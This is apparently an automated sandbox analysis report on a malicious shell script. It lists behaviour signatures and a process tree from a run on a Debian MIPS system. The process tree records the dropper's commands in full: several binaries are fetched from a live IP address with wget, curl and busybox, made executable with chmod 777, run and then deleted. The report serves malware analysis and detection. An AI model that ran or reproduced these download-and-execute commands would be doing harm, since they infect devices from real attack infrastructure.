Analysis Overview
SHA256
d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165
Threat Level: Shows suspicious behavior
The file d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 03:22
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 03:22
Reported
2024-10-28 03:25
Platform
debian9-mipsbe-20240611-en
Max time kernel
74s
Max time network
72s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
Processes
/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh
[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
